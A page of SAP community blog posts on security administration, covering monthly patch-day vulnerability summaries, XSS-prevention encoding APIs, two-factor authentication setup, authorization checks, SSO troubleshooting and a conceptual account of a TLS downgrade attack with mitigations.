1 2 3 12 Previous Next

Security

167 Posts

It is not so rare to face the "Error while creating PSE" (TRUST040) when trying to create SNC SAPCryptolib PSE in SAP Netweaver AS ABAP environment. This might happen due to old corrections (check SAP Notes 1740744, 1756908 and 2198198). However, these corrections are not the most common cause for this error.

 

It is not so rare to find customers facing this error because their environment is not configured to use SAPCryptolib or CommonCryptoLib as SNC product, then the "Error while creating PSE" (TRUST040) when trying to create SNC SAPCryptolib PSE is expected/correct.

 

Customers can verify the SNC product configured in their environment by checking the parameter snc/gssapi_lib. The most common scenario is having it set to Kerberos library and, in such case, the SNC PSE won't be possible to be created, since Kerberos library does not use SNC SAPCryptolib PSE.

 

 

In other words... What is important to remember is:

 

=> If customer's environment does not use SAPCryptolib or CommonCryptolib as SNC product, there is no need to maintain the SNC SAPCrytpolib PSE. The name "SNC SAPCrytpolib PSE" already indicates that this PSE only has to be (and can be) created when SAPCrytpolib or CommonCryptoLib is used for SNC. Using Kerberos libraries or other external SNC products do not require such PSE.

With SAP GRC new product offering  SAP Dynamic authorization management, Security administrators can SOLVE complex access control requirements with the help of attributes. Consider a requirement like below

 

 

anand.png

  

Taking  into consideration all the different components (N) and making an access control decision is complex. Roles alone cannot handle the above requirement, if you are choosing the route of customization, I would say good luck!.

 

 

With SAP Dynamic Authorization Management, we can take into consideration limitless conditions to make access control decisions. So next time if there is a complex security requirement, you know that there is a product out there that would be able to handle it.

 

How it works, Please refer to the link below for SAP DAM solution brief

http://www.sap.com/pc/analytics/governance-risk-compliance/software/access-control-authorization-mgmt/index.html

 

-Anand Kotti

SAP has released the monthly critical patch update for August 2015. This patch update closes 22 vulnerabilities in SAP products, 15 have high priority, some of them belong to the SAP HANA security area. The most popular vulnerability is Cross Site Scripting (XSS). This month, three critical vulnerabilities found by ERPScan researchers Dmitry Chastuhin, Vahagn Vardanyan, Roman Bejan were closed.

 

Issues that were patched with the help of ERPScan


Below are the details of SAP vulnerabilities that were found by ERPScan researchers.

 

  • An XML eXternal Entity vulnerability in SAP Mobile Platform 2.3 (CVSS Base Score: 4.9). Update is available in SAP Security Note 2152227. An attacker can use XML eXternal Entities to send specially crafted unauthorized XML requests, which will be processed by the XML parser. The attacker will get unauthorized access to the OS file system.
  • An XML eXternal Entity vulnerability in SAP NetWeaver Portal (CVSS Base Score: 4.9). Update is available in SAP Security Note 2168485. An attacker can use XML eXternal Entities to send specially crafted unauthorized XML requests, which will be processed by the XML parser. The attacker will get unauthorized access to the OS file system.
  • An XSS vulnerability in SAP Afaria 7 (CVSS Base Score: 4.3). Update is available in SAP Security Note 2152669. An attacker can modify displayed application content without authorization and steal authentication data (cookie).

 

The most critical issues found by other researchers


Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Security Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:

 

  • 2037304: SAP ST-P has a Remote Command Execution vulnerability (CVSS Base Score: 8.5). An attacker can use Remote Command Execution to run commands remotely. Executed commands will run with the privileges of the service that executes them. An attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.
  • 2169391: SAP NetWeaver AFP Servlet has a Reflected File Download vulnerability (CVSS Base Score: 7.5). Reflected File Download (RFD) is a web attack vector that enables attackers to gain complete control over a victim's machine. In an RFD attack, the user follows a malicious link to a trusted domain resulting in a file download from that domain. It is recommended to install this SAP Security Note to prevent risks.
  • 2175928: SAP HANA has a Running Process Remote Termination vulnerability (CVSS Base Score: 6.8). An attacker can use this vulnerability to terminate the process of a vulnerable component. Nobody will be able to use this service, which has a negative impact on business processes, system downtime, and business reputation. It is recommended to install this SAP Security Note to prevent risks.
  • 2165583: SAP HANA has an incorrect system configuration vulnerability (CVSS Base Score: 6.6). SAP HANA internal services could be accessed without authentication if the HANA system is insecurely configured and no other security measures are in place. This could endanger system availability, data confidentiality and integrity. It is recommended to install this SAP Security Note to prevent risks.

 

It is highly recommended to patch all those SAP vulnerabilities to prevent business risks affecting your SAP systems.

 

SAP has traditionally thanked the security researchers from ERPScan for found vulnerabilities on their acknowledgment page.

Hello, dear readers,

Recently we have finished our series of articles on how to Secure SAP Systems from XXS vulnerabilities. Having a great success with the previous series, I decided to launch another series of articles called “SAP Security for CISOs”. However, you don’t need to be a CISO to benefit from reading these articles as they are great starting point for everybody who is into security but wants to know more about emerging topic called SAP Security and doesn’t know where to begin. The article series will provide a step-by-step dive into SAP Security area for those who just started this amazing adventure. I will try to keep it less technical than usual so that everybody will be able to understand the basics. So, all the CISOs, security engineers, administrators, security consultants, penetration testers, researchers and even basis team are welcome.

 

First of all, let me introduce myself and my story of growing from security researcher, pentester and consultant to SAP Security expert and I think it may help you in your way of becoming an expert in this field too.

 

My experience in SAP Security started in early 2007. At that time, I was an intern penetration tester at a consulting company and in my free time I was writing a book about Oracle Database security. This book was about to finish and I was looking to dive into some other security area, something as complex as database security or even more, when a sheer coincidence helped me understand what I would do in the future and have been doing till now.

 

During one of penetration tests of a large Oil organization, there was a server in our scope and this server was called SAP. At that time, I was not aware of these systems and their security, for me it was just yet another box which I needed to exploit, get access to OS, create a screenshot with root access and include it in the report along with hundreds of other servers. I also dreamed that access to this server would help me find any information such as usernames of even passwords with which I would try to access Domain Controller. It was the main target for this project as well as for most of the similar projects.

 

When all traditional tests such as OS vulnerabilities, SSH bruteforce, public exploits for different services, and other typical ways to get unauthorized access did not succeed, I tried to find some information about this system (which apparently was SAP ERP) from public sources. Unfortunately (or fortunately), there was almost nothing in SAP Security area except some articles about Segregation of Duties. All that was possible to find was some information about how to configure a user account to prevent executing two critical actions such as create payment order and then approve it. But there was nothing about ways how an attacker can get access to SAP without having any rights and how to analyze if those vulnerabilities exist in the system. Almost no information about public vulnerabilities except a couple of buffer overflows, again without any examples of working exploits. After that, I decided to explore this system myself as I already had experience in discovering 0-day vulnerabilitiesin Oracle database, dozens of web applications and CMS systems. Surprisingly, it took me 15 minutes to find a 0-day vulnerability in this system and I got full access to SAP. At that moment, for me it was just another “BOX” which I needed to “PWN”, but the real understanding came later.

 

When we presented the results to management they were very surprised that we were able to break such an important system, that it was quite easy to do and that the system stored all mission-critical data of their company. After that, I realized that SAP system was something very critical for each company and, surprisingly, nobody cared about its security, and I decided that I definitely should learn more about this system.

 

Later on, I found out that it was an ERP system – Enterprise Resource Planning. According to Wikipedia, ERP is an integrated computer-based system used to manage internal and external resources including tangible assets, financial resources, materials, and human resource. Also, I understood that all business processes of an enterprise were generally contained in ERP systems. Any information an attacker, be it a cybercriminal, industrial spy or competitor, might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.

 

But ERP is just one example since there are other systems which also store and process critical data and they are also developed by SAP. Most popular are provided by SAP in SAP Business Suite that consists of ERP, CRM, SRM, PLM, and SCM. Of course, SAP is not the only vendor who develops these types of products, but it’s definitely the market leader. I found out that Oracle has a bunch of systems which provide similar functionality such as Oracle E-Business Suite, Oracle JDE, and Oracle PeopleSoft. There are also less popular systems such as Microsoft Dynamics or Infor. Some companies may have all business applications based on SAP while others can use a crazy mix of different solutions from different vendors that is very hard to manage by the way.

 

All those large enterprise applications are connected with each other like a spider's web. It’s not surprising that if you want to automate business processes you have to connect different applications. For example, you want to automatically generate an invoice in SAP System and send money to particular banking account via banking system, you need to connect ERP and Banking system. In reality, there are dozens of such type of connections and all of them can be critical in terms of security. Most importantly, those systems are connected not only inside corporate network but also with partner networks or with other providers such as banks or insurance companies via the internet. Some of these systems are connected directly with ICS/SCADA network and unauthorized access to them can lead to industrial sabotage.

 

After I saw all this new world of Business applications, the world which was totally closed for most of the security experts, I understood the main idea – “Why would any smart attacker be interested in hacking Domain Controller or network equipment of workstations where defense is becoming smarter if it’s much easier to directly target enterprise business applications, which are weak to nothing in regards to security but provide you the easiest way to commit fraud within a couple of mouse clicks”. This idea completely changed my conception of infrastructure security. It is these systems that store and process all critical data, and we should protect them first while nowadays it is often vice versa.

This post by SAP Product Security Response Team shares information on Patch Day Security Notes* that are released on second Tuesday of every month and fix vulnerabilities discovered in SAP products. SAP strongly recommends that the customer visits the Support Portal and applies patches on a priority to protect his SAP landscape.

 

On 11th of August 2015, SAP Security Patch Day saw the release of 22 security notes. Additionally, there are 4 updates to previously released Patch Day Security Notes.

____________________________________________________________________________________

 

Security Notes vs Vulnerability Type - August 2015

VD_chart.PNG

Security Notes vs Priority Distribution (Mar - August 2015)**

NP_chart.PNG

Patch Day Security Notes are all notes that appear under the category of "Patch Day Notes" in SAP Support Portal

** Any Patch Day Security Note released after the second Tuesday, will be accounted  for in the following SAP Security Patch Day.


To know more about the security researchers and research companies who have contributed for security patches of this month visit SAP Product Security Response Acknowledgement Page


Do write to us at secure@sap.com with all your comments and feedback on this blog post.

 

Yours,

SAP Product Security Response Team

The BlackHat USA conference, held in Las Vegas, is one of the biggest technical IT security conferences in the world, making it one of the most relevant events for the IT security community during the year. In addition to having people discuss and learn about the many new attacks and novel security techniques its THE place where people can get a deep understanding of security best practices via trainings and security research presentations.


The “Pwnie Awards” which are held every year during Black Hat, are a way that organizations and people get recognition as to the importance and impact of the critical vulnerabilities they have discovered.


Last Wednesday, the Pwnie Awards recognized an SAP Vulnerability as the most important server-side vulnerability of the year affecting a compression algorithm that is widely used across many SAP products (check SAP Security Notes 2124806, 2121661, 2127995 and 2125316), discovered by researcher Martin Gallo.

 

It's the first year that this award is related to an SAP security vulnerability. This is yet another proof point as to the increased importance of SAP cybersecurity to the cybersecurity community, but also the importance for SAP customers to secure their SAP implementations by applying patches, properly configuring the systems and properly monitoring them for security risks.


We have been helping SAP, working with the Product Security Response and HANA Security Teams, by reporting security vulnerabilities that are later fixed and patched by customers through their patch management initiatives and processes. If your company and SAP implementations are falling behind patches and security configurations, you should know that every month SAP releases new patches, addressing vulnerabilities that could expose these applications


SAP Security is more than Segregation of Duties and authorizations, so take a holistic approach to SAP cybersecurity by including it in your agenda and make it a priority across your organization to avoid risking unauthorized access to your most critical information and business processes.

There are a lot of things to like about the latest version of SAP Enterprise Threat Detection. In this blog I am going to introduce one of the more subtle improvements – semantic events.

 

Semantic Events

Take a look at the screenshot and compare the two filter paths. Can you guess what each does?

blog_semantic_events.gif

If you are intimate with the Security Audit Log in AS ABAP, you will of course know that the Event ID AU2 indicates that a user has attempted a dialog logon and failed. If that log type is not so familiar to you, I suspect you would rather deal with the semantic event "User, logon, failure, dialog".

 

Usability is not the only difference though. In the screenshot, both paths found the same event because the failed logon took place in an ABAP system. By using the semantic event, Path2 is not restricted to events from ABAP systems. Therefore, many of the attack detection patterns delivered in SP02 are now based on semantic events to broaden their applicability.

 

Relevant SAP Notes

2139392 - Release Note SAP Enterprise Threat Detection 1.0 SP02

When you see the error in system log, it means report RSUSR003 ran at that time and security violation was detected.

 

First step is to ensure note 1451760 is applied in the system.

 

If the error persists though you have implemented note 1451760, it means there is real security risk.

 

Run report RSUSR003 and check "Password Status" column, if there is any record shown in red background, change the password for the user to something which is not well known and not guessed easily..

 

After all records with background color are elimated, "Security Check Passed" will appear in system log while running RSUSR003 and it means no security risk for the standard users.

 

In some systems, you may find that RSUSR003 runs automatically though it is not intended.

 

This is because during EWA data collection, the collection program will call RSUSR003 to collect passwod status for standard users.

 

Relevant notes/kbas:

 

1451760 SUIM|RSUSR003 - inappropriate security violation message

 

863362 Security checks in SAP EarlyWatch Alert, EarlyWatch and GoingLive sessions

 

1610103 EarlyWatch Alert Report : section Default Password of Standard Users

Today’s post is the last in the series of articles about XSS vulnerabilities in SAP systems. The previous parts describe how to prevent XSS in SAP NetWeaver ABAP and SAP NetWeaver J2EE.

 

XSS is one of the most popular vulnerabilities and its effect can range from a petty nuisance to a significant security risk, depending on the sensitivity of the data. In SAP products, 628 XSS vulnerabilities were discovered that is almost 22% of all vulnerabilities found in SAP in 12 years.


From the developer’s perspective

There are several rules of protecting SAP HANA using SAP UI5 framework.

 

  • Validation of typed control properties - SAPUI5 core validates the value of properties set by the application against the type of the property. This guarantees that an int is always an int, and a sap.ui.core/CSSSize is a string representing a CSS size and does not contain a script tag. This also applies to enumerations and control IDs. The control renderer can rely on this check when writing the HTML.
  • Escaping - use helper methods to escape the value of a string property that is written to the HTML:
    • Use writeEscaped(oControl.getSomeStringProperty()) instead of just write(...) for writing plainly to the HTML.
    • Use writeAttributeEscaped(“someHtmlProperty”, oControl.getSomeStringProperty()) instead of just writeAttribute(...) for writing attributes.
    • Use jQuery.sap.escapeHTML(oControl.getSomeStringProperty()) for string properties where none of the other two options is possible to escape the string and then process it further.

From the administrator’s perspective

 

The administrator has to set the following parameters to improve security:

  • sessiontimeout = 900. Enable session timeout to minimize potential attack window.
  • HttpOnly cookie is enabled by Default.

From incident response perspective

 

To be able to identify the real attack happened because of the XSS vulnerability and also from some other web-based vulnerabilities, it is recommended to configure the following parameters.

 

  • To monitor all HTTP(s) requests processed in a SAP HANA system, you can set up the internal Web Dispatcher to write a standardized HTTP log for each request. To configure the Web Dispatcher to log all HTTP(s) requests, you add the property icm/http/logging _ 0:
    • set LOGFILE value to path_to_file Securing SAP Systems from XSS Vulnerabilities
    • Sеt PREFIX value to “/”. If URL prefix=”/” (root directory), or empty which means that all HTTP requests will be logged. If prefix value equal “/Directory”, the server will log only requests which call “/Directory” directory and subsequent.
    • Set FILEWRAP value to off. Old log files will be saved for future analysis.
  • global _ auditing _ state = true. The following configuration parameter for auditing is stored in global.ini, in the section auditing configuration. This can help you to log additional information such as logon’s logoffs and database requests which can be relevant for investigating XSS Attacks. You can find this configuration in SAP HANA Administration Console –> Security HDB –> Auditing Status menu.

Sometime, in a special scenario, you might get some SSO issue, and find it is related to the user locking.

  That is when the user is locked, the SSO could not work as usual, user get a logon page.

 

The main point of troubleshotting such issue is, find out the complete scearion of this issue.

   Make clear who is the SSO enter, who is SSO credencial issuer, which SSO type between.

 

Here finially, the scenario is this:

1. The enter is the corporation Portal for all business.

2. There has a link point to a iView of another Portal (second Portal).

    And these 2 portals are Federat Portals. So the SSO type between them is Logon Ticket.

3. The second Portal use a ABAP (BW) system as its UME data source.

 

The whole issue is, when user password gets locked in ABAP system (by many invalid password logon), the user will not SSO from enter portal to second portal.

Even if, the ABAP parameter login/failed_user_auto_unlock=1 has been set. The user still could not logon on next day.

 

Then from the logon page properties, find it belongs second Portal, So confirm the issue is on Portal/Java side, not the ABAP side.

 

Finially, found the reason is when user get locked (from ABAP side), the Portal/Java system will not let user logon via SSO.

And there has a UME property could control this: ume.logon.allow_password_locked_users_sso_login.

 

More information is in these Notes:

#1708850 - User is authenticated even though change password fails

#1900890 - Allow login of users whose password Is locked via SSO

 

After set this property, the user could logon via SSO when user password is locked.

(No matter the user is in Java own data source or other ABAP data source.)

 

(Others, the user lock status will not be changed when logon via SSO,

  only the correct password logon could change it automatically.)

 

Hope this blog could help you on troubleshooting of similar issue.

*******************************************************************************************************

IMPORTANT:                                                                                                                                             

The standard restriction with Authorization Object: B_BUPA_ATT dont works correctly (the BP transaction dont refresh the authorization error), the best way is create the restriction aith an Z authorization Object and a Badi:       *******************************************************************************************************        

The BP restriction by header field "Grouping"

 

1.png

We will use a Badi doing a check of authorities with an Z authorization object.

The steps to follow are:

 

1. We go to SU20 and we define a field ZGROUPING (this field will be use in the Z authorization object), we need add the name field and the elemend data:

2.png

 

2. Next go to SU21 and we will create a Z Authorization Object ZGROUPING using the field that we defined before

23.png

 

3. We go to transaction SE19, and next we will add the corresponding code in the Badi of the BP. We need to go SE19 and we will create an implementation of the Badi: BUPA_FURTHER_CHECKS called ZBUPA_FURTHER_CHECKS

3.png


4.png


4. The next step will be update the implementation created: ZBUPA_FURTHER_CHECKS, inside of it, we will go to tab "Interface" and double click in the method CHECK_CENTRAL:

1.png2.png

 

5. It will open a code line where we need add the corresponding Authity-Check (using the Z authorization object created), I  used the following ABAP code:


  
AUTHORITY-CHECK OBJECT 'ZGROUPING'
                   
ID 'ZGROUPING' FIELD iv_group.

   
IF sy- subrc <> 0.
     
MESSAGE e000(zish_pa ) WITH text- 001 iv_group.
   
ENDIF .

 

3.png

 

6. We go to PFCG transaction and we need to create a Z test role  adding the BP transaction by role menu (I usually add XK03 and XD03 transactions too), we need complete all authorizations and add the ZGROUPING authorization object created, resticting the values that we need to restrict.

1.png

1.png


In this case, the role will have access to the following Groupings: ZBAN, ZDR1, ZDR2 and ZDR3


En nuestro caso, al rol le vamos a dar acceso a los Groupings: ZBAN, ZDR1, ZDR2 y ZDR3


7. We need to create a Test user (into SU01 transaction) and we will asign the test role ZTEST (I usually add the standard role SAP_BC_ENDUSER to give access to basic transactions as SU53, etc.)

 

Note: Is possible that before assign the standard role SAP_BC_ENDUSER, we need generate the profile of this standard role.

 

1.png2.png

 

8. We log-in with the test user and we go to BP transaction to force the authorization error. We need to create a Business Partner for the Grouping ZPAT (the test used dont has access to this Gropuing). Next we will create a Business Partner to Grouping ZDR1 (he has access to this Grouping), to check that the restriction works correctly.

 

1.png

 

I am displaying the SU53 transaction (with the authorization error):

 

2.png

 

Next, we will create a BP for ZDR1, the user should to have access:

 

3.png

4.png

 

Done, with this, we have created the required Grouping restriction into BP transaction.

Do you have cloud applications for your employees or partners that you want to protect in a more secure and reliable way?

 

With SAP Cloud Identity, you can now decide which applications you want to protect better.

If you configure an application to have two-factor authentication, once the user of this application provides valid username and password, additional one-time password will be required as a second authentication factor.

 

What is one-time password (aka OTP or passcode)?

 

It is a 6-digits passcode (for example: 899866) that expires in 30 seconds. For the generation of the passcodes, the users need to install SAP Authenticator on their mobile device. It is a free mobile app available on iOS and Android.

 

Let’s take a closer look at the steps you need to enable two-factor authentication for your application.

 

  1. In the Administration Console for SAP Cloud Identity service, you need to open the Authentication and Access Tab for the application you want to configure.
  2. You just need to switch the slider to ON and two-factor authentication is enabled for this application. It is as simple as that.

turn-on-2FA-with-SAP-Cloud-Identity.png

What are the steps for the end users?

diagram.png

The users of a sample application “Green Holidays” need to enter correct username and password. As a second step, they are asked to enter a passcode, and then the authentication to the application is successful.

 

First Step:

login.png

Second Step:

passcode.png

If the user has a device already registered to generate passcodes for the two-factor authentication, she or he just has to enter the passcode from the mobile device, and will log on to the application.

sap-authenticator.png

If the user submits 5 incorrect passcodes, the passcode is locked for 60 minutes. A tenant administrator has an option to unlock manually the user passcode in the Administration Console.

 

If the users decide to use the feature “Remember me”, the passcode will still be required, only the first step when the users enter their credentials will be skipped.

 

How to activate a device that will generate passcodes?

 

The user needs to proceed as follows:

  1. Open the User Profile page in a web browser and press Activate under Two-Factor Authentication.
  2. Open SAP Authenticator app on a mobile device. Call the Add Account screen and scan the QR Code.
  3. Tap Add Account on your mobile device.
  4. Return to the User Profile page and enter the passcode generated by the SAP Authenticator and press Activate.

activate-2fa.png

The two-factor authentication is now activated. The user is able to login with a second factor to all applications from this SAP Cloud Identity tenant that require an OTP.

 

For the generation of the passcodes, SAP Authenticator uses a Time-based One Time Password (TOTP) Algorithm defined as an open standard RFC 6238.

Alternatively, you can use another application for the generation of the passcodes that is based on the same algorithm (e.g.  the Google Authenticator app).

 

Ensuring a higher level of security for your applications is a matter of a few steps to enable two-factor authentication. It is really that easy and it is really worth it.

 

For more information on other SAP Cloud Identity service features, please find a link to the official documentation.

SAP has released the monthly critical patch update for July 2015. This patch update closes a lot of vulnerabilities in SAP products, some of them belong in the SAP HANA security area. The most popular vulnerability is Missing Authorization Check. This month, one critical vulnerability found by ERPScan researcher Alexander Polyakov was closed.

Issues that were patched with the help of ERPScan

 

Below are the details of SAP vulnerabilities that were found by ERPScan researchers.

 

  • A Missing Authorization Check vulnerability in SAP XML Data Archiving Service (CVSS Base Score: 3.5). Update is available in SAP Security Note 1945215. An attacker can use Missing Authorization Checks to access a service without any authorization procedures and use service functionality that has restricted access. This can lead to an information disclosure, privilege escalation, and other attacks.


The most critical issues found by other researchers


Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Security Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:


  • 2180049: SAP ASE XPServer has a Missing Authorization Check vulnerability (CVSS Base Score: 9.3). An attacker can use Missing Authorization Checks to access a service without any authorization procedures and use service functionality that has restricted access. This can lead to information disclosure, privilege escalation, and other attacks. It is recommended to install this SAP Security Note to prevent risks.

 

  • 1952092: IDES ECC has a Remote Command Execution vulnerability (CVSS Base Score: 6.0). An attacker can use Remote Command Execution to run commands remotely without authorization. Executed commands will run with the privileges of the service that executes them. An attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.

 

  • 1971516: SAP SERVICE DATA DOWNLOAD has a Remote command execution vulnerability (CVSS Base Score: 6.0). An attacker can use Remote Command Execution to run commands remotely without authorization. Executed commands will run with the privileges of the service that executes them. An attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system. It is recommended to install this SAP Security Note to prevent risks.

 

  • 2183624: SAP HANA database has an Information Disclosure vulnerability. An attacker can use Information Disclosure for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks. It is recommended to install this SAP Security Note to prevent risks.

 

 

It is highly recommended to patch all those SAP vulnerabilities to prevent business risks affecting your SAP systems.

 

SAP has traditionally thanked the security researchers from ERPScan for found vulnerabilities on their acknowledgment page.

First of all, let’s have a few moments of silence in remembrance of SSL now that SSL is officially dead.

 

Long live TLS!

 

That said, even though a lot of SAP customers are relying on HTTPS (TLS) to ensure the confidentiality of data in motion in their Fiori applications over public networks, there are still fundamental weaknesses in even TLS that make data disclosure possible in a man in the middle attack. Consider the attack scenario in the next section.

 

 

Man in the Middle TLS Attack Scenario

The conversation in a well-behaved man in the middle  conversation to your Fiori Gateway Server (with, say, your local Starbucks WiFi hotspot as the man in the middle) should look something like the following:

Figure_1_MITM.png

 

The well-behaved man in the middle simply routes all requests to the server, without inspecting or modifying that traffic, and routes responses from the server back to the client.

 

Now, an attacker seeking to inspect that traffic could simply drop the request on the floor and forge a redirect – which would look something like the following:

Figure_2_MITM.png

This has the effect of forcing future communication to the Fiori Gateway Server to the unencrypted HTTP protocol, allowing the attacker to inspect all traffic to the NetWeaver Gateway unencrypted. An attacker would have the luxury of viewing payment details and other types of confidential data in clear text.

Figure_3_MITM.png

 

Most supported Fiori web browsers and the Fiori client will not warn the user of the change from HTTPS to HTTP – the user would need to pay close attention to the browser's encryption "lock" icons. Some browsers (think Chrome) will issue strong warnings that alert the user to the fact that the session is being downgraded to an HTTP session, but even then many users may err on the side of  “getting things done” and ignoring any warning messages.

 

Likelihood of this Scenario

When measuring risk, it helps to remember that Risk = Impact * Likelihood. In the past, man-in-the-middle attack scenarios were considered esoteric or difficult to pull off - a low-likelihood scenario. Today, with the ubiquity of WiFi, this is no longer the case. In fact, an attacker with limited technical knowledge can buy a $100 Pineapple device to take advantage of this particular vulnerability. Given these attacks can be pulled off by unsophisticated users with minimal investment, the likelihood of this type of man-in-the-middle attack is orders of magnitude higher than it was even 5 years ago.

 

 

Strategies for SAP Customers to Secure Data in Motion in Fiori Applications

This said, there are several approaches SAP customers can take to address this risk when rolling out Fiori to devices on public networks to address this specific risk. These include:

  1. Blocking access to the HTTP port on your NetWeaver Gateway server at the firewall. This is possibly the cheapest alternative available to SAP customers.
  2. Implementing HTTP Strict Transport Security. This requires some modification to standard Fiori to implement and requires browsers that support HSTS. Unfortunately, not all browsers support HSTS and so this option may not be effective in BYOD-scenarios
  3. Requiring that remote devices access your Fiori Launchpad over VPN. VPN tunnels can’t be negotiated down to an “unencrypted” version. Currently, the only known way attackers can attack VPN connections is to forge reset packets to drop the tunnel, in the hope that a user will give up using VPN and will try a less secure option.  On the negative side, VPN tunnels add to authentication complexity.
  4. Implementing SAP Application Protection by Mocana. This is a great offering that handles a host of security issues, including the specific man-in-the-middle attack scenario discussed here. This solution was designed to run applications securely on untrusted devices, protecting data at rest and in motion. A key feature of SAP Application Protection by Mocana is VPNs initiated from the application, so that an attacker doesn’t have the opportunity to inspect unencrypted data in motion even if they have control of the device.  And, Mocana-wrapped applications can take advantage of certificate-based authentication to reduce authentication complexity to both the Gateway and the Atlas VPN appliance.
  5. SAP Customers running the Afaria MDM solution have the ability to implement policies on devices to ensure WiFi connections are only to trusted networks, or can disable WiFi altogether (controlled by the policies “Connect to Specific APs” or “Get current WiFi AP’s SSID”). Many other MDM tools have similar capabilities. Again, this is not always possible to enforce in a BYOD scenario.
  6. Implementing HTTPS Everywhere plugins for all clients. Unfortunately, as of this writing this is not a viable option in a mobile device scenario.

 

 

Industry Initiatives to Address this Risk

There are several initiatives underway to address this scenario, all in various stages of adoption.

  • HTTPS Everywhere – this is a browser plugin that always attempts to connect to the web server/service via HTTPS, regardless of the link or redirect information presented.
  • HTTPS Transport Security Protocol (HSTS)
  • Deprecate HTTP altogether and encrypt all web traffic

Unfortunately given the sheer number of internet-enabled servers and clients, I don’t see any of these making significant headway to addressing this issue internet-wide in a timely manner.

 

References

SSL is dead: https://www.ciso-central.org/transport-layer-security/ssl-is-dead-long-live-tls

OS/Browser combinations supported by Fiori: http://service.sap.com/sap/support/notes/1931218

Great blog on HTTP Strict Transport Security in SAP applications: http://scn.sap.com/community/labs/blog/2014/04/26/http-strict-transport-security-hsts

Listing of HSTS Supported Browsers: http://caniuse.com/#feat=stricttransportsecurity

Generic info on SAP Application Protection by Mocana: http://www.sap.com/pc/tech/mobile/software/solutions/emm/secure-apps.html

Blog on deprecating HTTP: https://blog.mozilla.org/security/2015/04/30/deprecating-non-secure-http/

From the developer’s perspective

 

For AS Java, the encoding is available as tc_sec_csi.jar. There is a static class and an interface which provides the encodings for HTML/XML, JavaScript, CSS and URL. Also it is available to use methods of public class StringUtils (com.sap.security.core.server.csi.util.StringUtils):

 

  • escapeScriptEndTag(String pStr) - Prepare a string to be used for a javascript string definition with particular care about script tag;
  • escapeScriptEndTag(StringBuffer sb, String pStr)- Prepare a string to be used for a javascript string definition with particular care about script tag.
  • escapeSpace(String input) - Encode a space with + Note that this function will call 'disableScriptSignatures'.
  • escapeToAttributeValue(String input) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToAttributeValue(StringBuffer sb, String input, int maxLength) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToAttributeValue(String input, int maxLength) - Encode a string for output as an attribute string of a tag, no URLs!
  • escapeToHTML(String input) - Encode a string for output between tags (CASE1)
  • escapeToHTML(StringBuffer sb, String input, int maxLength) - Encode a string for output between tags (CASE1)
  • escapeToHTML(String input, int maxLength) - Encode a string for output between tags (CASE1)
  • escapeToJS(String input) - Encode a string inside a JS string declaration (CASE5)
  • escapeToJS(StringBuffer sb, String input, int maxLength) - Encode a string inside a JS string declaration (CASE5)
  • escapeToJS(String input, int maxLength) - Encode a string inside a JS string declaration (CASE5)
  • escapeToURL(String input) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • escapeToURL(StringBuffer sb, String input, int maxLength) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • escapeToURL(String input, int maxLength) - Encode a string that represents a URL (CASE3) Note that this function will call 'disableScriptSignatures'.
  • urlEncode(String s) - A trivial replacement of URLEncoder.encode
  • urlEncode(StringBuffer sb, String s, char[] forceEncode) - This is an extended version of the URLEncoder.encode method.
  • urlEncode(String s, char[] forceEncode) - This is an extended version of the URLEncoder.encode method.


CASE1 (Output BETWEEN tags)


<head>
<title>[CASE1]</title>
</head>
<table>
  <tr>
  <td>Username</td>
  <td>[CASE1]</td>
  </tr>
</table>

 

CASE2 (Output INSIDE tags, but output is not a URL)

 

<form name="CASE2">
  <input type="text" name="user" value="[CASE2]">
  <input type="text" name="user" value='[CASE2]'>
</form>
<a name="[CASE2]">Click here</a>

 

CASE3 (Output is a URL)


<a href="CASE3" style="[CASE3]"><img src="[CASE3]"
lowsrc="[CASE3]"></a>

 

CASE4 (Output inside a SCRIPT context, but output is not a string declaration)

 

<script>
var a = [CASE4];
[CASE4];
</script>

 

CASE5 (Output is a string declaration in a script)

 

<script>
var a = '[CASE5]';
alert("[CASE5]");
</script>

 

The class name is XSSEncoder (class name with package name: com.sap.security.core.server.csi.XSSEncoder).

 

The interface is IXSSEncoder(interface with package name: com.sap.security.core.server.csi.IXSSEncoder). The interface can be retrieved with com.sap.security.core.server.csi.XSSEncoder.getInstance().

 

The class XSSEncoder and the interface IXSSEncoder are the successors of the class StringUtils (see SAP Security Note 866020 [10] and its update Note 1601461 [11]), so the same dependencies have to be fulfilled, for example, a runtime reference to the J2EE library security.class or tc/bl/security/lib and a compiler reference to tc_sec_csi.jar.

 

Context Method

HTML / XMLout = XSSEncoder.encodeHTML( in ) and XSSEncoder.encodeXML( val );
JavaScriptout = XSSEncoder.encodeJavaScript( val );
URLout = XSSEncoder.encodeURL( val );
CSSout = XSSEncoder.encodeCSS( val );

 

For information about the delivery of these extensions, see SAP Security Note 1590008 [12].


WebDynpro Java

 

For WebDynpro Java, you do not have to care about XSS. The security is ensured through the framework itself.


SAP UI Development Kit for HTML5

 

For the SAP UI Development Kit for HTML5, the encoding functions are implemented as a jQuery plug-in in framework/_core/src/main/js/jquery.sap.encoder.js.

 

The functions to use for the different contexts are:

HTML / XMLjQuery.sap.encodeHTML(sValue) and jQuery.sap.encodeXML(sValue)
